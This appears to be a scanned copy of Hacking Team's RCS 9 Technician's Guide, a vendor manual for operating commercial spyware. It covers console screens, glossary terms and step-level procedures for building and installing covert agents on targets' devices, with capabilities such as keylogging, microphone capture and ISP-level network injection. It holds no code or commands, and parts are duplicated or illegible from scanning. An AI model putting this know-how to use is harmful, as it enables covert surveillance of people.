Hacking Team RCS 9 Technician’s Guide
Oct. 30, 2014
]HackingTeam[
RCS 9
The hacking suite for governmental interception
Technician's Guide
Technician's Guide - ver.1.5
Information ownership
COPYRIGHT 2013, HT S.r.l.
All rights reserved in all countries.
No part of this manual can be translated into other languages and/or
adapted and/or reproduced in other formats and/or mechanically,
electronically processed or photocopied, recorded or otherwise
without prior written authorization from HackingTeam.
All corporations and product names may be legal or registered
trademarks, property of their respective owners. Specifically Internet
Explorer® is a Microsoft Corporation registered trademark.
Albeit text and images being selected with the utmost care,
HackingTeam reserves the right to change and/or update the
information hereto to correct typos and/or errors without any prior
notice or additional liability.
Any reference to names, data and addresses of companies not in the
HackingTeam is purely coincidental and, unless otherwise indicated,
included as examples to better clarify product use.
NOTE: requests for additional copies of this manual or product
technical information should be addressed to:
HT S.r.l.
via della Moscova, 13
20121 Milano (MI)
Italy
Tel.: 39 02 29 060 603
Fax: 39 02 63 118 946
e-mail: info@hackingteam.com
Contents
Glossary ... xiv
Guide introduction ... 1
New guide features ... 2
Supplied documentation ... 3
Print concepts for notes ... 4
Print concepts for format ... 4
Product and guide addressees
Software author identification data ... 6
RCS (Remote Control System)
Differences between RCS 8.0 and RCS 7.6 versions ... 8
Glossary ... 8
Infection vector glossary for desktop ... 8
Infection vector glossary for mobile ... 8
RCS Console for the Technician ... 10
Starting the RCS Console ... 11
What the login page looks like ... 11
Open RCS Console ... 11
Homepage description ... 12
Introduction ... 12
What it looks like ... 12
Wizards in the homepage ... 13
Introduction ... 13
What it looks like ... 13
Investigation Wizard ... 14
Shared interface elements and actions ... 14
What the RCS Console looks like ... 14
Actions always available on the interface ... 16
Change interface language or password ... 18
Converting the RCS Console date/time to the actual time zone
Table actions
Technician procedures ... 18
Introduction ... 18
Procedures ... 18
Injection on HTTP connections ... 18
Infecting a computer not connected to Internet ... 19
Infecting a computer connected to Internet ... 19
Keeping agent software updated ... 20
Operation and target ... 21
Technician's Guide ver.1.5 SEP-2013 RCS © 2013 HT S.r.l. - pag. i
What you should know about operations ... 22
What is an operation ... 22
What you should know about targets ... 22
What is a target ... 22
Operation management ... 22
Purpose ... 22
What the function looks like ... 22
To learn more ... 23
Viewing operation targets ... 24
Operation data ... 24
Operation page ... 24
Purpose ... 24
What the function looks like ... 24
To learn more ... 25
Creating a factory ... 26
Operation page data ... 26
Targets ... 27
Target page ... 28
Purpose ... 28
What the function looks like ... 28
To learn more ... 30
Creating a factory ... 30
Closing a factory or agent ... 30
Deleting a factory or agent ... 31
Importing target evidence ... 31
Target page data ... 31
Icon view ... 31
Table view ... 32
What you should know about factories and agents ... 33
Infection methods ... 33
Infection strategy components ... 33
Factories ... 33
How to create factories ... 34
Installation vectors ... 34
Agents ... 34
Data acquisition modules ... 34
Compiling a factory ... 35
Purpose ... 35
Next steps ... 35
What the function looks like ... 35
To learn more ... 36
Creating an agent ... 36
Creating an agent to be tested in demo mode
Agents ... 38
What you should know about agents ... 39
Agent installation ... 39
Evidence acquisition for installation environment analysis ... 39
Installation environment analysis ... 39
Updating the scout agent ... 39
Agent ... 40
Offline and online agents ... 40
Temporarily disabling an agent ... 40
Agent testing ... 40
Agent configuration ... 41
Agent page ... 41
Purpose ... 41
What the function looks like ... 41
To learn more ... 43
Agent configuration log data ... 43
Agent event log data ... 44
Agent log data ... 44
Command page ... 44
Purpose ... 44
What the function looks like ... 44
To learn more ... 46
Transferring files to/from a target ... 46
Purpose ... 46
What the function looks like ... 46
To learn more ... 46
Factory and agent: basic configuration ... 49
What you should know about basic configuration ... 50
Basic configuration ... 50
Exporting and importing configuration settings ... 50
Saving the configuration settings as a template ... 50
Basic factory or agent configuration ... 50
Purpose ... 50
Next steps ... 51
What the function looks like ... 51
To learn more ... 52
Setting a factory or agent configuration ... 53
Basic configuration data ... 53
Factory and agent: advanced configuration ... 55
What you should know about advanced configuration ... 56
Advanced configuration ... 56
Advanced configuration components ... 56
Reading sequences
Events ... 57
Actions ... 58
Relations between actions and modules ... 58
Relations between actions and events ... 58
Modules ... 59
Exporting and importing configuration settings ... 59
Saving the configuration settings as a template ... 59
Advanced factory or agent configuration ... 59
Purpose ... 59
Next steps ... 60
What the function looks like ... 60
To learn more ... 62
Creating a simple activation sequence ... 62
Creating a complex activation sequence ... 62
Global agent data ... 63
The Network Injector ... 65
What you should know about Network Injector and its rules ... 66
Introduction ... 66
Network Injector types ... 66
Types of resources that can be infected ... 66
How to create a rule ... 66
Automatic or manual identification rules ... 66
What happens when a rule is enabled/disabled
Starting the infection ... 67
Managing the Network Injector
Purpose
What you can
What the function looks like
To learn more ... 69
Adding a new injection rule ... 69
Send the rules to Network Injector ... 69
Injection rule data ... 70
Checking Network Injector status ... 74
Introduction
Basic configuration data ... 53
Factory and agent: advanced configuration ... 55
What you should know about advanced configuration ... 56
Advanced configuration ... 56
Advanced configuration components ... 56
Reading sequences
Events ... 57
Actions ... 58
Relations between actions and modules ... 58
Relations between actions and events ... 58
Modules ... 59
Exporting and importing configuration settings ... 59
Saving the configuration settings as a template ... 59
Advanced factory or agent configuration ... 59
Purpose ... 59
Next steps ... 60
What the function looks like ... 60
To learn more ... 62
Creating a simple activation sequence ... 62
Creating a complex activation sequence ... 62
Global agent data ... 63
The Network Injector ... 65
What you should know about Network Injector and its rules ... 66
Introduction ... 66
Network Injector types ... 66
Types of resources that can be infected ... 66
How to create a rule ... 66
Automatic or manual identification rules ... 66
What happens when a rule is enabled/disabled
Starting the infection ... 67
Managing the Network Injector
Purpose
What you can do
What the function looks like
To learn more ... 69
Adding a new injection rule ... 69
Send the rules to Network Injector ... 69
Injection rule data ... 70
Checking Network Injector status ... 74
Introduction
Identifying when Network Injector
What you should know about Appliance Control Center ... 75
Introduction ... 75
with RCS server ... 75
Injection interface IP address ... 75
Appliance Control Center ... 76
Purpose ... 76
What you can do ... 76
Password request ... 76
What the function looks like ... 76
To learn more ... 77
Enabling with RCS server to receive new rules ... 77
Infecting targets using automatic identification ... 78
Viewing infection details ... 79
Appliance Control Center data ... 79
Network Injector data tab ... 79
What you should know about Tactical Control Center ... 80
Introduction ... 80
Tactical Control Center operations ... 80
with RCS server ... 81
Updating infection rules ... 81
Using network interfaces ... 81
Infection via automatic identification ... 81
Infection via manual identification ... 82
Enable with RCS
Protected WiFi network password acquisition ... 83
Infection via automatic identification ... 83
Forcing unknown device authentication ... 83
Infection via manual identification ... 83
Setting filters on tapped traffic ... 83
Filter with regular expression ... 84
BPF (Berkeley Packet Filter) network filter ... 84
Identifying a target by analyzing the chronology ... 84
Emulating an Access Point known by the target ... 84
Tactical Control Center ... 84
Purpose ... 84
What you can do ... 85
Password request ... 85
What the function looks like ... 85
To learn more ... 86
Enabling with RCS server to receive new rules ... 86
Running a network test
Acquiring a protected WiFi network password ... 88
Infecting targets using automatic identification ... 89
Forcing unknown device authentication ... 91
Infecting targets using manual identification ... 91
Setting filters on tapped traffic ... 92
Identify the target by analyzing web chronology ... 93
Cleaning erroneously infected devices ... 94
Emulating an Access Point known by the target ... 94
Turn off Tactical Network Injector ... 95
Viewing infection details ... 95
Tactical Control Center data ... 96
Network Injector data tab ... 96
Found device data ... 96
Wireless Intruder data tab
Fake Access Point data tab
System monitoring ... 99
System monitoring (Monitor) ... 100
Purpose ... 100
What the function looks like ... 100
To learn more ... 101
System monitoring data (Monitor) ... 101
System component monitoring data ... 101
License monitoring data ... 102
Appendix: actions ... 104
List of sub-actions ... 105
Sub-action data description ... 105
Sub-action type description ... 105
Destroy action ... 105
Purpose ... 105
Operating systems ... 105
Parameters ... 106
Execute action ... 106
Purpose ... 106
Reference to the agent's folder ... 106
Operating systems ... 106
Significant data
Log action
Purpose
Operating systems ... 107
Parameters
SMS action
Purpose ... 107
Operating systems
Parameters ... 108
action ... 108
Purpose ... 108
Operating systems ... 108
Desktop settings ... 109
Mobile settings ... 109
Uninstall action ... 110
Purpose ... 110
Operating systems ... 110
Parameters ... 110
Appendix: events ... 111
Event list ... 112
Event data description ... 112
Event type description ... 112
AC event ... 113
Purpose ... 113
Operating systems ... 113
Parameters ... 113
Battery event ... 113
Purpose ... 113
Operating systems ... 113
Parameters ... 113
Call event ... 114
Purpose ... 114
Operating systems ... 114
Parameters ... 114
Connection event ... 114
Purpose ... 114
Operating systems ... 114
Mobile settings ... 114
Desktop settings ... 115
Idle event ... 115
Purpose ... 115
Operating systems ... 115
Parameters ... 115
Position event ... 115
Purpose ... 115
Operating systems ... 115
Parameters ... 116
Process event ... 116
Purpose ... 116
Operating systems ... 116
Parameters ... 116
Quota event ... 117
Purpose
Operating systems
Parameters ... 117
Screensaver event ... 117
Purpose
Operating systems ... 117
Parameters ... 117
SimChange event
Purpose
Operating systems ... 118
Parameters ... 118
SMS event ... 118
Purpose ... 118
Operating systems ... 118
Parameters ... 118
Standby event ... 118
Operating systems ... 118
Parameters ... 118
Timer event ... 119
Purpose ... 119
Operating systems ... 119
Parameters ... 119
Window event ... 119
Purpose ... 119
Operating systems ... 120
Parameters ... 120
WinEvent event ... 120
Purpose ... 120
Operating systems ... 120
Parameters ... 120
Appendix: modules ... 121
Module list ... 122
Addressbook module ... 123
    Purpose ... 123
    Operating systems ... 123
    Significant data ... 124
Application module ... 124
    Purpose ... 124
    Operating systems ... 124
    Significant data ... 124
Calendar module ... 124
    Purpose ... 124
    Operating systems ... 124
    Significant data ... 124
Call module ... 125
    Purpose ... 125
    Operating systems ... 125
    Significant data ... 125
Camera module ... 125
    Purpose ... 125
    Operating systems ... 125
    Significant data ... 126
Chat module ... 126
    Purpose ... 126
    Operating systems ... 126
    Significant data ... 126
Clipboard module ... 126
    Purpose ... 126
    Operating systems ... 126
    Significant data
Conference module ... 127
    Purpose ... 127
    Operating systems
    Significant data ... 127
Crisis module ... 127
    Behavior on desktop devices ... 127
    Behavior on mobile devices ... 127
    Operating systems ... 128
    Significant desktop data ... 128
    Significant mobile data ... 128
Device module ... 129
    Purpose ... 129
    Operating systems ... 129
    Significant mobile data ... 129
File module ... 129
    Purpose ... 129
    Operating systems ... 129
    Significant data ... 129
Infection module ... 130
Keylog module ... 130
    Purpose ... 130
    Operating systems ... 130
    Significant data ... 131
Livemic module ... 131
    Purpose ... 131
    Operating systems ... 131
    Significant data ... 131
Messages module ... 131
    Purpose ... 131
    Operating systems ... 132
    Significant data ... 132
Mic module ... 132
    Purpose ... 132
    Platforms ... 132
    Significant data ... 133
Mouse module ... 133
    Purpose ... 133
    Operating systems ... 134
    Significant data ... 134
Password module ... 134
    Purpose ... 134
    Operating systems ... 134
    Significant data ... 134
Position module ... 134
    Purpose ... 134
    Operating systems ... 134
    Significant mobile data ... 135
Screenshot module ... 135
    Purpose ... 135
    Operating systems ... 135
    Significant data ... 135
Url module ... 136
    Purpose ... 136
    Operating systems ... 136
    Significant data ... 136
Appendix: installation vectors ... 137
List of installation vectors ... 138
Operating systems supported by agents ... 138
What you should know about Android ... 139
    Root privileges ... 139
Obtaining a Code Signing certificate ... 139
    Introduction ... 139
    Installing the Code Signing certificate ... 140
Exploit vector (desktop) ... 140
    Purpose ... 140
    Installation ... 140
    Deleting no longer used files ... 140
    Operating systems ... 140
    Parameters ... 140
Melted Application vector ... 141
    Purpose ... 141
    Operating systems ... 141
    Parameters ... 141
Network Injection vector ... 141
    Purpose ... 141
    Operating systems ... 142
    Parameters ... 142
Offline Installation vector ... 142
    Purpose ... 142
    Operating systems ... 142
    Parameters ... 142
Silent Installer vector ... 143
    Purpose ... 143
    Operating systems ... 143
    Parameters ... 143
U3 Installation vector ... 144
    Purpose ... 144
    Operating systems ... 144
    Parameters ... 144
Exploit vector (mobile) ... 144
    Purpose ... 144
    Installation ... 144
    Deleting no longer used files ... 144
    Example of installer copy command on the device ... 144
    Operating systems ... 145
    Parameters ... 145
Installation Package vector ... 145
    Purpose ... 145
    Notes for Android operating systems (vector preparation) ... 145
    Notes for Android operating systems (installation) ... 145
    Notes for Windows Phone operating systems (vector preparation) ... 146
    Notes for Windows Phone operating systems (installation) ... 146
    Notes for Windows Mobile operating systems ... 147
    Notes for BlackBerry operating systems ... 147
    Notes for Symbian operating systems ... 148
    Operating systems ... 148
    Android, iOS, WinMobile, Windows Phone parameters ... 148
    BlackBerry settings ... 148
    Symbian settings ... 148
Local Installation vector ... 149
    Purpose ... 149
    Operating systems ... 149
    Parameters ... 149
QR Code/Web Link vector ... 149
    Purpose ... 149
    Operations ... 149
    Deleting no longer used files ... 150
    Operating systems ... 150
    Parameters ... 150
WAP Push Message vector
    Purpose ... 150
    Operations ... 151
    Installation ... 151
    Deleting no longer used files ... 151
    Operating systems ... 151
    Parameters ... 151
Installation Package preparation for Symbian ... 152
    Introduction ... 152
    Recommended sequence ... 152
    Obtain the Editor ID (you…) ... 153
    Creating Certificate Public and Private keys ... 153
    Creating the Development Certificate ... 153
Installation Package preparation for Windows Phone ... 154
    Introduction ... 154
    Recommended sequence
    How to read these instructions ... 155
    Obtaining a Symantec ID code ... 155
    Obtaining a Symantec certificate ... 156
    Installing the Symantec certificate
    Generate the .pfx and .aetx files ... 158
    Load the .pfx and .aetx files on the RCS database server ... 159
RCS 9 - Glossary
Glossary
The terms and their definitions used in this manual are provided below.
A
Accounting
Console section that manages RCS access.
acquisition sequence
Group of complex events, actions and acquisition modules that make up the advanced agent configuration.
Administrator
The person who enables user access to the system, creates work groups and defines operations, targets and the type of data to be collected.
Agent
Software probes installed on devices to monitor. They are designed to collect evidence and communicate it to the Collector.
alert rules
Rules that create alerts when new evidence is stored or agents communicate back for the first time.
Alerting
Console section that manages new evidence alerts.
alerting group
Group of users who receive notifications via mail whenever a system alarm is triggered (for example, when the database exceeds available free space limits). Normally this group is not linked to an operation.
Analyst
Person in charge of analyzing the data collected during operations.
Anonymizer
(optional) Protects the server against external attacks and permits anonymity during investigations. Transfers agent data to Collectors.
Audit
Console section that reports all users' and system actions. Used to monitor abuse of RCS.
back end
Environment designed to and save collected information. In distributed architecture, it includes Master Node and Shard databases.
BRAS
(Broadband Remote Access Server) routes traffic to/from DSLAM to the ISP network and provides authentication to the ISP subscribers.
BSSID
(Basic Service Set IDentifier) Access Point and its client identifier.
Collector
Receives data sent by agents directly or through the Anonymizer chain.
console
Computer on which the RCS Console is installed. It directly accesses the RCS Server or Master Node.
Dashboard
Console section used by the Analyst. Used to have a quick overview of the status of the most important operations, targets and agents.
DSLAM
(Digital Subscriber Line Access Multiplexer) network device, often located in the telephone exchanges of the telecommunications operators. It connects multiple customer digital subscriber line interfaces to a high-speed digital communications channel using multiplexing techniques.
entity
Group of intelligence information linked to the target and people and places involved in the investigation.
ESSID
(Extended Service Set IDentifier) Known as SSID, identifies the network.
evidence
Collected data evidence. The format depends on the type of evidence (e.g. image).
evidence alerts
Alerts, usually in the form of emails, sent when new evidence matches the set rule.
factory
A template for agent configuration and compiling.
front end
Environment designed to communicate with agents to collect information and set their configurations. In distributed architecture, it includes the Collector and Network Controller.
injection rules
Settings that define how to identify HTTP traffic, what resource should be injected and what method is to be used for the injection.
Monitor
Console section that monitors components and license status.
Network Controller
Component that checks Network Injector and Anonymizer status and sends them new configurations and software updates.
Network Injector
Hardware component that monitors the target's network traffic and injects an agent into selected Web resources. It comes in two versions, Appliance or Tactical: the former is for deployment at the ISP, the latter for use on the field.
Network Injector Appliance
Rackable version of the Network Injector, for installation at ISP. See: Tactical Network Injector.
O
operation
Investigation aimed at one or more targets, whose devices will be recipients for agents.
RCS
(Remote Control System) the product documented hereto.
RCS Console
Software designed to interact with the RCS Server.
RCS Server
One or more computers, based on the installation architecture, where essential RCS components are installed: Shard databases, Network Controllers and Collector.
SSH
(Secure Shell) a network protocol for secure data communication, remote shell services or command execution.
System
Console section that manages the system.
System administrator
The person who installs the servers and consoles, updates software and restores data in case of faults.
Tactical Network Injector
The portable version of Network Injector, for tactical use. See: Network Injector Appliance.
TAP
(Test Access Port) a hardware device installed in a network that passively monitors the transmitted data flow.
target
The physical person under investigation.
Technician
The person assigned by the Administrator to create and manage agents.
VPS
(Virtual Private Server) a remote server where the Anonymizer is installed. Commonly available for rent.
WPA
(Wi-Fi Protected Access) WiFi network protection.
WPA 2
(Wi-Fi Protected Access) WiFi network protection.
Guide introduction
Presentation
Manual goals
This manual is a guide for the Technician on how to use the RCS Console to:
• create agents and install them on a target defined by the Administrator
• create HTTP connection injection rules for Network Injectors
Information on how to consult the manual is provided below.
Content
This section includes the following topics:
New guide features 2
Supplied documentation 3
Print concepts for notes 4
Print concepts for format 4
Product and guide addressees 5
New guide features
List of release notes and updates to this online help.

Release date: 30 September 2013
Code: Technician's Guide 1.5 SEP-2013
Software version: 9
Description:
• Added Windows Phone platform, see "Installation Package vector" on page 145.
• Updated documentation to manage root privileges for Android devices, see "What you should know about Android" on page 139.
• Updated Network Injector management documentation, see "The Network Injector" on page 65.
• Updated documentation due to improvements to the user interface.
• Improved the contents.

Release date: 3 July 2013
Code: Technician's Guide 1.4 JUL-2013
Software version: 8.4
Description:
• The chance to test network connections, select an additional dictionary to attack a WPA or WPA 2 protected network and display installed rules were added on Tactical Control Center. Network signal power is now always visible. See "What you should know about Tactical Control Center" on page 80.
• A public IP address can be mapped on a private IP address set on the network interface and installed rules viewed on Appliance Control Center. See "What you should know about Appliance Control Center" on page 75.
• Removed the ... rule and added INJECT-HTML-FILE and ... rules. See "Injection rule data" on page ...
• Deleted the Applet Web vector and deprecated the Infection Module.
• Added note to Uninstall action on Android. See "Uninstall action" on page 110.
• For Android, the limit of root privileges necessary for Chat, Messages and Screenshot modules has been extended to all operating system versions. See "Chat module" on page 126, "Messages module" on page 131.
Release date: 15 March 2013
Code: Technician's Guide 1.3 MAR-2013
Software version: 8.3
Description:
• Changed Tactical Control Center use. See "Tactical Control Center" on page 84.
• Changed Appliance Control Center use. See "Appliance Control Center" on page ...
• Added possibility of creating a factory on the operation level. See "Operation page" on page 24.
• Changed Installation Package and Melted application vectors, see "List of installation vectors" on page 138.
• Added possibility of disabling screenshot evidence in the scout agent. See "What you should know about agents" on page 39.
• Added license management to exclude file upload and command execution on the target device. See "Transferring files to/from a target" on page 46.

Release date: 15 October 2012
Code: Technician's Guide 1.2 OCT-2012
Software version: 8.2
Description:
• Added basic or advanced configuration save as template. See "What you should know about basic configuration" on page 50 and "What you should know about advanced configuration" on page 56.
• Added quick investigation creation wizard. See "Wizards in the homepage" on page 13.
• Added scout agent management. See "What you should know about agents" on page 39.

Release date: 30 June 2012
Code: Technician's Guide 1.1 JUN-2012
Software version: 8.1
Description:
• Added agent functions, see "Agent page" on page 41.
• Added Idle event, see "Idle event" on page 115.
• Changed installation for Exploit, WAP push and QR Code vectors. Changed vectors Offline Installation, Installation Package, see "List of installation vectors" on page 138.
• Changed Symbian certification process, see "Installation Package preparation for Symbian" on page 152.
• Code Signing certificate for Melted Application and Silent Installer vectors, see "Obtaining a Code Signing certificate" on page 139.

Release date: 16 April 2012
Code: Technician's Guide 1.0 APR-2012
Software version: 8.0
Description: First publication

Supplied documentation
The following manuals are supplied with RCS software:
Manual: System Administrator's Guide
Addressees: System administrator
Code: System Administrator's Guide 1.4 SEP-2013
Distribution format: PDF

Manual: Administrator's Guide
Addressees: Administrators
Code: Administrator's Guide 1.4 SEP-2013
Distribution format: PDF

Manual: Technician's Guide (this manual)
Addressees: Technicians
Code: Technician's Guide 1.5 SEP-2013
Distribution format: PDF

Manual: Analyst's Guide
Addressees: Analysts
Code: Analyst's Guide 1.4 SEP-2013
Distribution format: PDF

Print concepts for notes
Notes foreseen in this document are listed below (Microsoft Manual of Style):
WARNING: indicates a risky situation which, if not avoided, could cause user injury or equipment damages.
CAUTION: indicates a risky situation which, if not avoided, can cause data to be lost.
IMPORTANT: offers the indications required to complete the task. While notes can be neglected and do not influence task completion, important indications should not be neglected.
NOTE: neutral and positive information that emphasize or add information to the main text. They provide information that can only be applied in special cases.
Tip: suggestion for the application of techniques and procedures described in the text according to special needs. It may suggest an alternative method and is not essential to text comprehension.
Service call: the operation may only be completed with the help of technical service.
Print concepts for format
A key to print concepts is provided below:
Example: See "User data"
Style: italic
Description: this indicates a chapter, section, sub-section, paragraph, table or illustration heading in this manual or other publication of reference.

Example: (not legible)
Description: indicates text that must be specified by the user according to a certain syntax. In the example is a date and could be "14/07/2011".

Example: Select one of the listed servers
Description: indicates the object specified in the text that appears in the adjacent image.

Example: Click Add. / Select the File menu, Save data.
Style: bold
Description: indicates text on the operator interface, a graphic element (table, tab) or screen button (display).

Example: Press ENTER
Style: UPPER CASE
Description: indicates the name of keyboard keys.

Example: See: Network Injector Appliance.
Style: -
Description: suggests you compare the definition of a word in the glossary or content with another word or content.

Product and guide addressees
Following is the list of professionals that interact with RCS.

System administrator (expert network technician): Follows the HackingTeam's instructions provided during the contract phase. Installs and updates RCS servers, Network Injectors and RCS Consoles. Schedules and manages backups. Restores backups if servers are replaced.
WARNING: the system administrator must have the required necessary skills. The HackingTeam is not liable for equipment malfunctions or damages due to unprofessional installation.
Administrator (investigation manager): Creates authorized accounts and groups. Creates operations and target. Monitors system and license status.
Technician (tapping specialist technician): Creates and sets up agents. Sets Network Injector rules.
Analyst (operative): Analyzes and exports evidence.
Software author identification data
HT
via della Moscova, 13
20121 Milano
Italy
Tel.: 39 02 29 060 603
Fax: 39 02 63 118 946
e-mail: info@hackingteam.com
RCS (Remote Control System)
Presentation
Introduction
RCS (Remote Control System) is a solution that supports investigations by actively and passively tapping data and information from the devices targeted by the investigations. In fact, RCS anonymously creates, sets and installs software agents that collect data and information, sending the results to the central database to be and saved.
Content
This section includes the following topics:
Differences between RCS 8.0 and RCS 7.6 versions 8
Differences between RCS 8.0 and RCS 7.6 versions
Differences with the RCS 7.6 version are described below.
Glossary
RCS v. 7.6 -> RCS 8.0 and higher
Activity -> Operation
Agent -> Module
Anonymizer chain -> Anonymizing chain
Backdoor -> Agent
Backdoor Class -> Factory
Collection Node -> Collector
Injection Proxy Appliance -> Network Injector Appliance
Log Repository -> Master Node and additional Shard
Mobile Collection Node -> Collector
(not legible) -> Anonymizer
Infection vector glossary for desktop
RCS v. 7.6 -> RCS 8.0 and higher
EXE -> Melted application
CD -> Offline Installation
USB -> Offline Installation
EXPL -> Exploit
Infection vector glossary for mobile
RCS v. 7.6 -> RCS 8.0 and higher
SD -> Local Installation
CAB -> Installation Package
APP -> Exploit
SIS -> Installation Package, Symbian
COD
APK -> Installation Package
WAP Push Message
RCS Console for the Technician
Presentation
The Technician's role
The Technician's role is to:
• create injection rules for each installed Network Injector
• create infection agents for the various target devices
• keep agent software updated
Technician enabled functions
To complete his/her activities, the Technician has access to the following functions:
• Operation
• System
Content
This section includes the following topics:
Starting the RCS Console 11
Homepage description 12
Wizards in the homepage 13
Shared interface elements and actions 14
Technician procedures
Starting the RCS Console
When started, RCS Console asks you to enter your credentials previously set by the Administrator.
What the login page looks like
This is what the login page looks like:
(Figure: RCS Console login page)
Area | Description
1 | Title bar with command buttons: Close RCS Console; Expand window button; Shrink window button.
2 | Login dialog window.
Open RCS Console
To open RCS Console functions:
Step | Action
1 | In Username and Password, enter the credentials as assigned by the Administrator.
2 | In Server, enter the name of the machine or server address to connect to.
Technician's Guide yer.1.5 RCSQ 20136:) - pag. 11
Step Action
3 Click the login button: the homepage appears with the menus enabled according to your account privileges. See "Homepage description" below.
Homepage description
To view the homepage: click the home button.
Introduction
The homepage is displayed when the RCS Console is started, and is the same for all users. Enabled menus depend on the privileges assigned to the account.
What it looks like
This is what the homepage looks like, with recently opened items saved. For details on shared elements and actions:
[Screenshot: RCS Console homepage with recent items]
Area Description
1 Title bar with command buttons.
2 RCS menu with functions enabled for the user.
3 Search box to search operations, targets, agents and entities, by name or description.
Technician's Guide ver.1.5 RCS 9 © 2013 HT - pag. 12
Area Description
4 Links to the last five elements opened (operation in the Operations section, operation in the Intelligence section, target, agent and entity).
5 Wizard buttons.
6 Logged in user with possibility of changing the language and password.
7 Download area with ability to view progress during export or compiling.
8 Current date and time with possibility of changing the time zone.
Wizards in the homepage
To view the homepage: click the home button.
Introduction
For users with certain privileges, RCS Console displays buttons that run wizards.
What it looks like
This is how the homepage is displayed with enabled wizards:
[Screenshot: RCS Console homepage with wizard buttons enabled]
Technician's Guide ver.1.5 RCS 9 © 2013 HT - pag. 13
Button Function
Investigation wizard button: Open the wizard to quickly create an agent.
NOTE: the button is only enabled for users with Administrator and Technician privileges.
Save wizard button: Open the wizard to quickly save operation and target data.
NOTE: the button is only enabled for users with Administrator and System Administrator privileges.
Investigation Wizard
This wizard quickly creates an agent. The wizard asks you to enter the name and type of agent to be created (desktop or mobile) and creates, in the following order:
1. an operation
2. a target
3. a factory
4. a user group in which the current user is the sole member
and directly opens the factory configuration page. See "Basic factory or agent configuration" on page 50.
Other elements can be added to this operation, target or user group by simply using the detail page.
Shared interface elements and actions
Each program page uses shared elements and allows similar actions to be run.
For easier manual comprehension, elements and actions shared by some functions are described in this chapter.
What the RCS Console looks like
This is what a typical RCS Console page looks like. A target page is displayed in this example:
Technician's Guide ver.1.5 RCS 9 © 2013 HT - pag. 14
[Screenshot: a typical RCS Console page (target page)]
Area Description
1 Title bar with command buttons:
• Logout from RCS.
• Page refresh button.
• Expand window button.
• Shrink window button.
2 Return to homepage button, and RCS menu with functions enabled for the user.
3 Operation scroll bar. Descriptions are provided below:
Icon Description
• Back to higher level.
• Show the operation page (Operations section).
• Show the target page.
• Show the factory page.
• Show the agent page.
• Show the operation page (Intelligence section).
• Show the entity page.
Technician's Guide ver.1.5 RCS 9 © 2013 HT - pag. 15
Area Description
4 Buttons to display all elements regardless of their group membership. Descriptions are provided below:
Icon Description
• Show all operations.
• Show all targets.
• Show all agents.
• Show all entities.
5 Window toolbar.
6 Search buttons and box:
Object Description
• Search box. Enter part of the name to display a list of elements that contain the entered letters.
• Display elements in a table.
• Display elements as icons.
7 Logged in user with possibility of changing the language and password.
8 Download area with ability to view progress during export or compiling. Files are downloaded to the desktop in the RCS Download folder.
• top bar: percent generation on server
• bottom bar: percent download from server to RCS Console.
9 Current date and time with possibility of changing the time zone.
Actions always available on the interface
Change interface language or password
To change the interface language or password:
Step Action
1 Click the logged in user area to display a dialog window with the user's data.
2 Change the language or password and click Save to confirm and exit.
Technician's Guide ver.1.5 RCS 9 © 2013 HT - pag. 16
Converting the RCS Console date-time to the actual time zone
To convert all dates-times to the actual time zone:
Step Action
1 Click the date and time area to display a dialog window with the current date-time:
• UTC time: Greenwich mean time (GMT)
• Local Time: date-time where the RCS server is installed
• Console time: date-time of the console used and which can be converted.
2 Change the time zone and click Save to confirm and exit: all displayed dates-times are converted as requested.
Table actions
The RCS Console displays various data in tables. Tables let you:
• sort data by column in increasing/decreasing order
• filter data by column
Action Description
Sort by column: Click on the column heading to sort that column in increasing or decreasing order.
[Screenshot: table sorted by a column]
Filter a text: Enter part of the text you are searching for: only elements that contain the entered text appear.
[Screenshot: text filter box]
The example shows elements with descriptions like:
• "myboss"
• "bossanova"
Technician's Guide ver.1.5 RCS 9 © 2013 HT - pag. 17
Action Description
Filter based on an option: Select an option: the elements that match the selected option appear.
[Screenshot: single-option filter (Acquired, Last Hours, Last Week, From/To, Action, User)]
Filter based on several options: Select one or more options: the elements that match all selected options appear.
[Screenshot: multiple-option filter (Untagged, Low, Medium, High, Critical)]
Change the column size: Select the edge of the column and drag it.
Technician procedures
Introduction
The Technician is in charge of infection rules to retrieve important information. Some typical procedures are described below with references to significant chapters. These are only simple indications. Skill and ability are essential to exploit RCS flexibility and adapt it to investigation needs.
Procedures
Injection on HTTP connections
Network Injector must be used for injections on HTTP connections:
Technician's Guide ver.1.5 RCS 9 © 2013 HT - pag. 18
Step Action
1 In the System, Network Injector section, create identification and injection rules for Network Injector Appliance and Tactical Network Injector.
See "Managing the Network Injector" on page 6?.
NOTE: no agent installation is required.
2 When using Network Injector Appliance, the system applies the identification rules to traffic data. Once target devices are found, they are infected with the injection rules. Or they can be automatically or manually identified and infected using Tactical Network Injector.
See "Tactical Control Center" on page 84.
Infecting a computer not connected to Internet
To infect a computer not connected to Internet:
Step Action
1 Create a factory by disabling on the operation level, see "Operation page" on page 24.
Or create a factory on the target level always without, see "Target page" on page 28.
2 Compile the factory selecting the installation vector suited to the device platform and installation method, then create the agent.
See "Compiling a factory" on page 35.
3 Install the agent on the target device with the selected methods.
See "List of installation vectors" on page 138.
4 After the required amount of time, retrieve evidence produced on the target device. Import agent evidence and analyze it.
See "Agent page" on page 41.
Infecting a computer connected to Internet
To infect a computer connected to Internet:
Tip: these steps are essential when you do not initially know which target activities to record or to avoid recording an excessive amount of data.
Technician's Guide ver.1.5 RCS 9 © 2013 HT - pag. 19
Step Action
1 Create a factory: the system automatically enables
See "Operation page" on page 24.
2 Compile the factory selecting the installation vector suited to the device platform and installation method, then create the agent.
See "Compiling a factory" on page 35.
3 Install the agent on the target device with the selected methods.
See "List of installation vectors" on page 138.
4 The agent appears in the target page at first
See "Target page" on page 28.
5 Reset the agent using the basic or advanced configuration. The agent applies the new configuration at the next
See "Basic factory or agent configuration" on page 50.
See "Advanced factory or agent configuration" on page 59.
Keeping agent software updated
HackingTeam cyclically updates its software. To update installed agents:
Step Action
1 In Operations section, Target, update agents. See "Target page" on page 28.
or
In Operations section, Target, open an agent and update it. See "Agent page" on page 41.
Technician's Guide ver.1.5 RCS 9 © 2013 HT - pag. 20
Operation and target
Presentation
Introduction
Managing operations sets the targets to be tapped.
Content
This section includes the following topics:
What you should know about operations 22
What you should know about targets 22
Operation management 22
Operation data 24
Operation page 24
Operation page data 25
Technician's Guide ver.1.5 RCS 9 © 2013 HT - pag. 21
What you should know about operations
What is an operation
An operation is an investigation to be conducted. An operation contains one or more targets meaning the physical individuals to be tapped. The Technician assigns one or more agents, desktop or mobile, to the target. Thus the agent can be installed on a computer or mobile phone.
